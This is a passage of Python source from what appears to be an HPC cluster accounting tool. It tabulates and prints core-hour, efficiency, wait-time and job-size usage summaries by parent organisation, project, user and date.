        'Coproc Mem %Eff': percent(tot['coproc_mem_hours'], tot['coproc_mem_req_hours']),
        **{b['name']: sum(row[b['name']] for row in table) for b in bins},
    }
    return headers, table, totals
def summarise_parentsbydate(data, parent, bins):
    """Tabulate one parent's usage per date range, plus a TOTALS row.

    Returns (headers, table, totals); rows carry every column even when
    the headers list (driven by CLI flags) omits some.
    NOTE(review): the TOTALS '%Usg' denominator only accumulates over
    dates where this parent was active — confirm that's intended.
    """
    headers = ['Date', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg']
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend(['Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff'])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    avail_core_hours = sum(d['date']['core_hours'] for d in data)
    max_core_hours = sum(d['date']['max_core_hours'] for d in data)
    metrics = ('cpu_hours', 'mem_hours', 'mem_req_hours', 'wait_hours',
               'wall_hours', 'wall_req_hours', 'coproc_hours',
               'coproc_req_hours', 'coproc_mem_hours', 'coproc_mem_req_hours')
    tot = {k: 0 for k in metrics}
    total_core_hours_adj = 0
    table = []
    for d in data:
        if parent in d['parents']:
            p = d['parents'][parent]
            # %Usg is relative to every parent active this date
            all_adj = sum(x['core_hours_adj'] for x in d['parents'].values())
            total_core_hours_adj += all_adj
            for k in metrics:
                tot[k] += p[k]
            table.append({
                'Date': d['date']['name'],
                'Users': p['users'],
                'Jobs': p['jobs'],
                'Core Hrs': p['core_hours'],
                'Adj Core Hrs': p['core_hours_adj'],
                '%Usg': percent(p['core_hours_adj'], all_adj),
                '%Avl': percent(p['core_hours_adj'], d['date']['core_hours']),
                '%Utl': percent(p['core_hours_adj'], d['date']['max_core_hours']),
                'Wait Hrs/Jobs': div(p['wait_hours'], p['jobs']),
                'Core Hrs/Wait': div(p['core_hours_adj'], p['wait_hours']),
                'Wall %Acc': percent(p['wall_req_hours'], p['wall_hours']),
                'Core %Eff': percent(p['cpu_hours'], p['core_hours_adj']),
                'Mem %Eff': percent(p['mem_hours'], p['mem_req_hours']),
                'Coproc %Eff': percent(p['coproc_hours'], p['coproc_req_hours']),
                'Coproc Mem %Eff': percent(p['coproc_mem_hours'], p['coproc_mem_req_hours']),
                **{b['name']: p['job_size'][i] for i, b in enumerate(bins)},
            })
        else:
            # Parent inactive this date: emit an all-zero row
            table.append({
                'Date': d['date']['name'],
                'Users': 0, 'Jobs': 0, 'Core Hrs': 0, 'Adj Core Hrs': 0,
                '%Usg': percent(0, 0), '%Avl': percent(0, 0), '%Utl': percent(0, 0),
                'Wait Hrs/Jobs': 0, 'Core Hrs/Wait': 0,
                'Wall %Acc': percent(0, 0), 'Core %Eff': percent(0, 0),
                'Mem %Eff': percent(0, 0), 'Coproc %Eff': percent(0, 0),
                'Coproc Mem %Eff': percent(0, 0),
                **{b['name']: 0 for b in bins},
            })
    totals = {
        'Date': 'TOTALS',
        # Distinct users across all dates, in projects under this parent
        'Users': len({u for d in data for prj in d['projusers']
                      if project_to_parent(prj) == parent
                      for u in d['projusers'][prj]}),
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
        'Wait Hrs/Jobs': div(tot['wait_hours'], sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), tot['wait_hours']),
        'Wall %Acc': percent(tot['wall_req_hours'], tot['wall_hours']),
        'Core %Eff': percent(tot['cpu_hours'], sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(tot['mem_hours'], tot['mem_req_hours']),
        'Coproc %Eff': percent(tot['coproc_hours'], tot['coproc_req_hours']),
        'Coproc Mem %Eff': percent(tot['coproc_mem_hours'], tot['coproc_mem_req_hours']),
        **{b['name']: sum(row[b['name']] for row in table) for b in bins},
    }
    return headers, table, totals
def summarise_projectsbydate(data, project, bins):
    """Tabulate one project's usage per date range, plus a TOTALS row.

    Returns (headers, table, totals); rows carry every column even when
    the headers list (driven by CLI flags) omits some.
    NOTE(review): the TOTALS '%Usg' denominator only accumulates over
    dates where this project was active — confirm that's intended.
    """
    headers = ['Date', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg']
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend(['Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff'])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    avail_core_hours = sum(d['date']['core_hours'] for d in data)
    max_core_hours = sum(d['date']['max_core_hours'] for d in data)
    metrics = ('cpu_hours', 'mem_hours', 'mem_req_hours', 'wait_hours',
               'wall_hours', 'wall_req_hours', 'coproc_hours',
               'coproc_req_hours', 'coproc_mem_hours', 'coproc_mem_req_hours')
    tot = {k: 0 for k in metrics}
    total_core_hours_adj = 0
    table = []
    for d in data:
        if project in d['projusers']:
            p = d['projects'][project]
            # %Usg is relative to every project active this date
            all_adj = sum(x['core_hours_adj'] for x in d['projects'].values())
            total_core_hours_adj += all_adj
            for k in metrics:
                tot[k] += p[k]
            table.append({
                'Date': d['date']['name'],
                'Users': p['users'],
                'Jobs': p['jobs'],
                'Core Hrs': p['core_hours'],
                'Adj Core Hrs': p['core_hours_adj'],
                '%Usg': percent(p['core_hours_adj'], all_adj),
                '%Avl': percent(p['core_hours_adj'], d['date']['core_hours']),
                '%Utl': percent(p['core_hours_adj'], d['date']['max_core_hours']),
                'Wait Hrs/Jobs': div(p['wait_hours'], p['jobs']),
                'Core Hrs/Wait': div(p['core_hours_adj'], p['wait_hours']),
                'Wall %Acc': percent(p['wall_req_hours'], p['wall_hours']),
                'Core %Eff': percent(p['cpu_hours'], p['core_hours_adj']),
                'Mem %Eff': percent(p['mem_hours'], p['mem_req_hours']),
                'Coproc %Eff': percent(p['coproc_hours'], p['coproc_req_hours']),
                'Coproc Mem %Eff': percent(p['coproc_mem_hours'], p['coproc_mem_req_hours']),
                **{b['name']: p['job_size'][i] for i, b in enumerate(bins)},
            })
        else:
            # Project inactive this date: emit an all-zero row
            table.append({
                'Date': d['date']['name'],
                'Users': 0, 'Jobs': 0, 'Core Hrs': 0, 'Adj Core Hrs': 0,
                '%Usg': percent(0, 0), '%Avl': percent(0, 0), '%Utl': percent(0, 0),
                'Wait Hrs/Jobs': 0, 'Core Hrs/Wait': 0,
                'Wall %Acc': percent(0, 0), 'Core %Eff': percent(0, 0),
                'Mem %Eff': percent(0, 0), 'Coproc %Eff': percent(0, 0),
                'Coproc Mem %Eff': percent(0, 0),
                **{b['name']: 0 for b in bins},
            })
    totals = {
        'Date': 'TOTALS',
        # Distinct users of this project across all dates
        'Users': len({u for d in data for u in d['projusers'].get(project, [])}),
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
        'Wait Hrs/Jobs': div(tot['wait_hours'], sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), tot['wait_hours']),
        'Wall %Acc': percent(tot['wall_req_hours'], tot['wall_hours']),
        'Core %Eff': percent(tot['cpu_hours'], sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(tot['mem_hours'], tot['mem_req_hours']),
        'Coproc %Eff': percent(tot['coproc_hours'], tot['coproc_req_hours']),
        'Coproc Mem %Eff': percent(tot['coproc_mem_hours'], tot['coproc_mem_req_hours']),
        **{b['name']: sum(row[b['name']] for row in table) for b in bins},
    }
    return headers, table, totals
def summarise_usersbydate(data, user, bins):
    """Tabulate one user's usage per date range, plus a TOTALS row.

    Returns (headers, table, totals); rows carry every column even when
    the headers list (driven by CLI flags) omits some.
    NOTE(review): the TOTALS '%Usg' denominator only accumulates over
    dates where this user was active — confirm that's intended.
    """
    headers = ['Date', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg']
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend(['Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff'])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    avail_core_hours = sum(d['date']['core_hours'] for d in data)
    max_core_hours = sum(d['date']['max_core_hours'] for d in data)
    metrics = ('cpu_hours', 'mem_hours', 'mem_req_hours', 'wait_hours',
               'wall_hours', 'wall_req_hours', 'coproc_hours',
               'coproc_req_hours', 'coproc_mem_hours', 'coproc_mem_req_hours')
    tot = {k: 0 for k in metrics}
    total_core_hours_adj = 0
    table = []
    for d in data:
        if user in d['users']:
            u = d['users'][user]
            # %Usg is relative to every user active this date
            all_adj = sum(x['core_hours_adj'] for x in d['users'].values())
            total_core_hours_adj += all_adj
            for k in metrics:
                tot[k] += u[k]
            table.append({
                'Date': d['date']['name'],
                'Jobs': u['jobs'],
                'Core Hrs': u['core_hours'],
                'Adj Core Hrs': u['core_hours_adj'],
                '%Usg': percent(u['core_hours_adj'], all_adj),
                '%Avl': percent(u['core_hours_adj'], d['date']['core_hours']),
                '%Utl': percent(u['core_hours_adj'], d['date']['max_core_hours']),
                'Wait Hrs/Jobs': div(u['wait_hours'], u['jobs']),
                'Core Hrs/Wait': div(u['core_hours_adj'], u['wait_hours']),
                'Wall %Acc': percent(u['wall_req_hours'], u['wall_hours']),
                'Core %Eff': percent(u['cpu_hours'], u['core_hours_adj']),
                'Mem %Eff': percent(u['mem_hours'], u['mem_req_hours']),
                'Coproc %Eff': percent(u['coproc_hours'], u['coproc_req_hours']),
                'Coproc Mem %Eff': percent(u['coproc_mem_hours'], u['coproc_mem_req_hours']),
                **{b['name']: u['job_size'][i] for i, b in enumerate(bins)},
            })
        else:
            # User inactive this date: emit an all-zero row
            table.append({
                'Date': d['date']['name'],
                'Jobs': 0, 'Core Hrs': 0, 'Adj Core Hrs': 0,
                '%Usg': percent(0, 0), '%Avl': percent(0, 0), '%Utl': percent(0, 0),
                'Wait Hrs/Jobs': 0, 'Core Hrs/Wait': 0,
                'Wall %Acc': percent(0, 0), 'Core %Eff': percent(0, 0),
                'Mem %Eff': percent(0, 0), 'Coproc %Eff': percent(0, 0),
                'Coproc Mem %Eff': percent(0, 0),
                **{b['name']: 0 for b in bins},
            })
    totals = {
        'Date': 'TOTALS',
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
        'Wait Hrs/Jobs': div(tot['wait_hours'], sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), tot['wait_hours']),
        'Wall %Acc': percent(tot['wall_req_hours'], tot['wall_hours']),
        'Core %Eff': percent(tot['cpu_hours'], sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(tot['mem_hours'], tot['mem_req_hours']),
        'Coproc %Eff': percent(tot['coproc_hours'], tot['coproc_req_hours']),
        'Coproc Mem %Eff': percent(tot['coproc_mem_hours'], tot['coproc_mem_req_hours']),
        **{b['name']: sum(row[b['name']] for row in table) for b in bins},
    }
    return headers, table, totals
def summarise_parents(data, bins):
    """Summarise one period's usage aggregated by parent organisation.

    data: a single period's accounting record (contains 'parents', 'users'
          and 'date' sub-dictionaries).
    bins: job-size bin definitions; one extra column is added per bin.
    Returns (headers, table, totals) suitable for print_table().
    """
    headers = [ 'Parent', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    parents = data['parents']
    # Sum one counter across every parent (used repeatedly for TOTALS).
    def parents_total(key):
        return sum(parents[p][key] for p in parents)
    core_hours_adj = parents_total('core_hours_adj')
    table = []
    for parent, d in sorted(parents.items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
        # NOTE: the original ended this append with a stray trailing comma,
        # turning the whole statement into a pointless 1-tuple; removed.
        table.append({
            'Parent': parent,
            'Users': d['users'],
            'Jobs': d['jobs'],
            'Core Hrs': d['core_hours'],
            'Adj Core Hrs': d['core_hours_adj'],
            '%Usg': percent(d['core_hours_adj'], core_hours_adj),
            '%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
            '%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
            'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
            'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
            'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
            'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
            'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
            'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
            'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
            **{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
        })
    wait_hours = parents_total('wait_hours')
    totals = {
        'Parent': 'TOTALS',
        'Users': len(data['users']),
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
        'Wait Hrs/Jobs': div(wait_hours, sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), wait_hours),
        'Wall %Acc': percent(parents_total('wall_req_hours'), parents_total('wall_hours')),
        'Core %Eff': percent(parents_total('cpu_hours'), sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(parents_total('mem_hours'), parents_total('mem_req_hours')),
        'Coproc %Eff': percent(parents_total('coproc_hours'), parents_total('coproc_req_hours')),
        'Coproc Mem %Eff': percent(parents_total('coproc_mem_hours'), parents_total('coproc_mem_req_hours')),
        **{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
    }
    return headers, table, totals
def summarise_projects(data, bins):
    """Summarise one period's usage aggregated by project.

    data: a single period's accounting record (contains 'projects',
          'users' and 'date' sub-dictionaries).
    bins: job-size bin definitions; one extra column is added per bin.
    Returns (headers, table, totals) suitable for print_table().
    """
    headers = [ 'Project', 'Parent', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    projects = data['projects']
    # Sum one counter across every project (used repeatedly for TOTALS).
    def projects_total(key):
        return sum(projects[p][key] for p in projects)
    core_hours_adj = projects_total('core_hours_adj')
    table = []
    for project, d in sorted(projects.items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
        # NOTE: the original ended this append with a stray trailing comma,
        # turning the whole statement into a pointless 1-tuple; removed.
        table.append({
            'Project': project,
            'Parent': project_to_parent(project),
            'Users': d['users'],
            'Jobs': d['jobs'],
            'Core Hrs': d['core_hours'],
            'Adj Core Hrs': d['core_hours_adj'],
            '%Usg': percent(d['core_hours_adj'], core_hours_adj),
            '%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
            '%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
            'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
            'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
            'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
            'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
            'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
            'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
            'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
            **{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
        })
    wait_hours = projects_total('wait_hours')
    totals = {
        'Project': 'TOTALS',
        'Parent': '-',
        'Users': len(data['users']),
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
        '%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
        '%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
        '%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
        'Wait Hrs/Jobs': div(wait_hours, sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), wait_hours),
        'Wall %Acc': percent(projects_total('wall_req_hours'), projects_total('wall_hours')),
        'Core %Eff': percent(projects_total('cpu_hours'), sum_key(table, 'Adj Core Hrs')),
        'Mem %Eff': percent(projects_total('mem_hours'), projects_total('mem_req_hours')),
        'Coproc %Eff': percent(projects_total('coproc_hours'), projects_total('coproc_req_hours')),
        'Coproc Mem %Eff': percent(projects_total('coproc_mem_hours'), projects_total('coproc_mem_req_hours')),
        **{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
    }
    return headers, table, totals
def summarise_users(data, bins):
    """Summarise one period's usage per user, limited to the busiest users.

    Only the top args.limitusers users (ranked by adjusted core hours)
    appear in the table; the TOTALS row still covers every user.
    Returns (headers, table, totals) suitable for print_table().
    """
    headers = [ 'Usr', 'Project(s)', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    users = data['users']
    # Sum one counter across every user (the TOTALS row covers all users,
    # not just the ones shown in the table).
    def users_total(key):
        return sum(users[u][key] for u in users)
    core_hours_adj = users_total('core_hours_adj')
    ranked = sorted(users.items(), key=lambda item: item[1]['core_hours_adj'], reverse=True)
    table = []
    for rank, (user, d) in enumerate(ranked, start=1):
        if rank > args.limitusers: break
        table.append({
            'Usr': user,
            'Project(s)': ",".join(sorted(o for o in data['projusers'] if user in data['projusers'][o])),
            'Jobs': d['jobs'],
            'Core Hrs': d['core_hours'],
            'Adj Core Hrs': d['core_hours_adj'],
            '%Usg': percent(d['core_hours_adj'], core_hours_adj),
            '%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
            '%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
            'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
            'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
            'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
            'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
            'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
            'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
            'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
            **{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
        })
    shown_adj = sum_key(table, 'Adj Core Hrs')
    totals = {
        'Usr': 'TOTALS',
        'Project(s)': '-',
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': shown_adj,
        '%Usg': percent(shown_adj, core_hours_adj),
        '%Avl': percent(shown_adj, data['date']['core_hours']),
        '%Utl': percent(shown_adj, data['date']['max_core_hours']),
        'Wait Hrs/Jobs': div(users_total('wait_hours'), sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(shown_adj, users_total('wait_hours')),
        'Wall %Acc': percent(users_total('wall_req_hours'), users_total('wall_hours')),
        'Core %Eff': percent(users_total('cpu_hours'), shown_adj),
        'Mem %Eff': percent(users_total('mem_hours'), users_total('mem_req_hours')),
        'Coproc %Eff': percent(users_total('coproc_hours'), users_total('coproc_req_hours')),
        'Coproc Mem %Eff': percent(users_total('coproc_mem_hours'), users_total('coproc_mem_req_hours')),
        **{ b['name']: sum(d[b['name']] for d in table) for b in bins },
    }
    return headers, table, totals
def summarise_project(data, project, bins):
    """Summarise one project's per-user usage for a single period.

    Only the top args.limitusers members (ranked by adjusted core hours)
    appear in the table; the TOTALS row still covers every member.
    Returns (headers, table, totals) suitable for print_table().
    """
    headers = [ 'Usr', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
    if args.availstats: headers.extend(['%Avl', '%Utl'])
    if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
    headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
    if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
    if bins: headers.extend([b['name'] for b in bins])
    members = data['projusers'][project]
    # Sum one counter across every member of this project.
    def members_total(key):
        return sum(members[u][key] for u in members)
    core_hours_adj = members_total('core_hours_adj')
    ranked = sorted(members.items(), key=lambda item: item[1]['core_hours_adj'], reverse=True)
    table = []
    for rank, (user, d) in enumerate(ranked, start=1):
        if rank > args.limitusers: break
        table.append({
            'Usr': user,
            'Jobs': d['jobs'],
            'Core Hrs': d['core_hours'],
            'Adj Core Hrs': d['core_hours_adj'],
            '%Usg': percent(d['core_hours_adj'], core_hours_adj),
            '%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
            '%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
            'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
            'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
            'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
            'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
            'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
            'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
            'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
            **{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
        })
    shown_adj = sum_key(table, 'Adj Core Hrs')
    totals = {
        'Usr': 'TOTALS',
        'Jobs': sum_key(table, 'Jobs'),
        'Core Hrs': sum_key(table, 'Core Hrs'),
        'Adj Core Hrs': shown_adj,
        '%Usg': percent(shown_adj, core_hours_adj),
        '%Avl': percent(shown_adj, data['date']['core_hours']),
        '%Utl': percent(shown_adj, data['date']['max_core_hours']),
        'Wait Hrs/Jobs': div(members_total('wait_hours'), sum_key(table, 'Jobs')),
        'Core Hrs/Wait': div(shown_adj, members_total('wait_hours')),
        'Wall %Acc': percent(members_total('wall_req_hours'), members_total('wall_hours')),
        'Core %Eff': percent(members_total('cpu_hours'), shown_adj),
        'Mem %Eff': percent(members_total('mem_hours'), members_total('mem_req_hours')),
        'Coproc %Eff': percent(members_total('coproc_hours'), members_total('coproc_req_hours')),
        'Coproc Mem %Eff': percent(members_total('coproc_mem_hours'), members_total('coproc_mem_req_hours')),
        **{ b['name']: sum(d[b['name']] for d in table) for b in bins },
    }
    return headers, table, totals
def print_table(headers, data, totals):
    """Pretty-print one summary table via tabulate.

    headers: ordered column names (must be unique).
    data: list of row dictionaries keyed by column name.
    totals: optional totals row dictionary, appended last.
    """
    if len(headers) != len(set(headers)):
        print("ERROR: cannot have multiple columns with same name", headers)
    # Construct rows in header order
    tab_data = [[d[column] for column in headers] for d in data]
    if totals:
        tab_data.append([totals[column] for column in headers])
    # Attempt to promote all elements in table to floats, in order to show
    # the thousands separator; non-numeric cells (e.g. "50.0%") are left
    # as-is.  (Was a bare "except: None" - narrowed to the two exceptions
    # float() can actually raise.)
    for row in tab_data:
        for (column, value) in enumerate(row):
            try:
                row[column] = float(value)
            except (TypeError, ValueError):
                pass
    floatfmt = ".0f" if args.nocommas else ",.0f"
    print(tabulate(tab_data, headers=headers, floatfmt=floatfmt),"\n")
def print_summary(data, reports, bins):
    """Print every requested report section for the loaded accounting data.

    data: list of per-period summary records (one per date range).
    reports: collection of report names; 'all' enables every section.
    bins: job-size bin definitions passed through to the summarisers.
    """
    # Legend for the column abbreviations used by all tables below.
    print("Fields:")
    print("- Adj *: figure adjusted to account for large memory requests")
    print("- %Usg: proportion of used core hours")
    if args.availstats:
        print("- %Avl: proportion of available core hours")
        print("- %Utl: proportion of max possible core hours")
    if args.waitstats:
        print("- Wait Hrs/Jobs: sum(queuing hours) / num jobs)")
        print("- Core Hrs/Wait: sum(adj core hours) / sum(elapsed hours from submit to finish)")
    print("- Wall %Acc: accuracy of user h_rt request (100% == perfect, 200% == used half requested time)")
    print("- %Eff: efficiency - how much of a allocated resource was actually used")
    print("- Numbers: how many core hours were clocked up by jobs with that number of cores")
    print("")
    if 'all' in reports or 'totalsbydate' in reports:
        print("=======")
        print("Totals:")
        print("=======\n")
        print_table(*summarise_totalsbydate(data, bins))
    if 'all' in reports or 'parentsbydate' in reports:
        print("================")
        print("Parents by date:")
        print("================\n")
        # One table per parent seen in any period.
        for parent in sorted(set([p for d in data for p in d['parents']])):
            print("Parent:", parent)
            print_table(*summarise_parentsbydate(data, parent, bins))
    if 'all' in reports or 'projectsbydate' in reports:
        print("=================")
        print("Projects by date:")
        print("=================\n")
        # One table per project seen in any period.
        for project in sorted(set([p for d in data for p in d['projusers']])):
            print("Project:", project)
            print_table(*summarise_projectsbydate(data, project, bins))
    if 'all' in reports or 'parents' in reports:
        print("============")
        print("Top parents:")
        print("============\n")
        for d in data:
            print("Period:", d['date']['name'],"\n")
            print_table(*summarise_parents(d, bins))
    if 'all' in reports or 'projects' in reports:
        print("=============")
        print("Top projects:")
        print("=============\n")
        for d in data:
            print("Period:", d['date']['name'],"\n")
            print_table(*summarise_projects(d, bins))
    if 'all' in reports or 'users' in reports:
        print("==========")
        print("Top users:")
        print("==========\n")
        for d in data:
            print("Period:", d['date']['name'],"\n")
            print_simplestats(d['users'], args.limitusers)
            print_table(*summarise_users(d, bins))
    if 'all' in reports or 'usersbydate' in reports:
        print("=============")
        print("Users by date:")
        print("=============\n")
        # One table per user seen in any period.
        for user in sorted(set([u for d in data for u in d['users']])):
            print("User:", user)
            print_table(*summarise_usersbydate(data, user, bins))
    if 'all' in reports or 'projectbyusers' in reports:
        print("=====================")
        print("Top users by project:")
        print("=====================\n")
        for d in data:
            print("Period:", d['date']['name'],"\n")
            for project in sorted(d['projusers']):
                print("Project:", project)
                print_simplestats(d['projusers'][project], args.limitusers)
                print_table(*summarise_project(d, project, bins))
def print_simplestats(data, top_n):
    """Print a one-line activity statistic for a user dictionary.

    data: mapping of user name -> usage record.
    top_n: number of top users the caller is about to show.  Currently
        unused: an earlier draft (removed dead code) compared the usage of
        the top_n users against the bottom of the distribution; the
        parameter is kept so existing call sites keep working.
    """
    print(len(data),"active users.")
# Format num/dom as a percentage string with one decimal place,
# falling back to 0 on an empty/zero denominator (via div()).
def percent(num, dom):
    ratio = float(div(num, dom))
    return format(ratio, ".1%")
# Division that tolerates a zero/empty denominator by returning 0.
def div(num, dom):
    if not dom:
        return 0
    return num / dom
# Sum one named column over a list of row dictionaries.
def sum_key(data, key):
    return sum(row[key] for row in data)
# Take a list of date ranges (as generated by parse_startend) and
# Create a new list containing a list of month-long date ranges
# covering the same periods.
def splitdates(dates, by):
    """Split each date range into month- or year-long sub-ranges.

    dates: list of {'name', 'start', 'end'} dicts (epoch seconds).
    by: 'month' or 'year' to split; anything else returns the ranges
        unchanged.
    Returns a new list of {'name', 'start', 'end'} dicts.

    NOTE(review): strftime('%s') is a non-portable platform extension and
    applies the host's local timezone to these naive datetimes - confirm
    the host runs in UTC, otherwise range boundaries shift.
    """
    d = []
    for date in dates:
        if by == 'month':
            # Rewind to the first instant of the month containing 'start',
            # then step forward one month at a time until past 'end'.
            dt = datetime.datetime.utcfromtimestamp(date['start'])
            dt = dt.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
            while int(dt.strftime('%s')) < date['end']:
                d.append({
                    'name': dt.strftime('%Y%m'),
                    'start': int(dt.strftime('%s')),
